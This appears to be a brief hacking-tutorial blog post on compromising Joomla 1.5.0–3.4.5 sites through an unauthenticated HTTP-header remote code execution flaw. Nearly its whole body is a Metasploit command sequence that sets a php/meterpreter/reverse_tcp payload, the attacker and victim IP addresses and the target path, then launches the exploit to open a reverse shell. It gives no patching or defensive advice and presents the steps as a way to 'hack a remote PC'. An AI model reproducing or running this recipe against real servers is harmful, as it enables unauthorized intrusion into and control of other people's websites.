Hack Remote PC using Joomla HTTP Header Unauthenticated Remote Code Execution


Exploit Targets
Joomla 1.5.0 - 3.4.5

Requirement
Attacker: kali Linux
Victim PC: Joomla 3.4.5


Open Kali terminal type msfconsole


msf exploit (joomla_http­_header_rce)>set payload php/meterpreter/reverse_tcp
msf exploit (joomla_http­_header_rce)>set lhost 192.168.0.106 (IP address of kali Linux)
msf exploit (joomla_http­_header_rce)>set targeturi /joomla/
msf exploit (joomla_http­_header_rce)>set rhost 192.168.0.104 (IP of Remote Host)
msf exploit (joomla_http­_header_rce)>exploit        

0 comments:

Post a Comment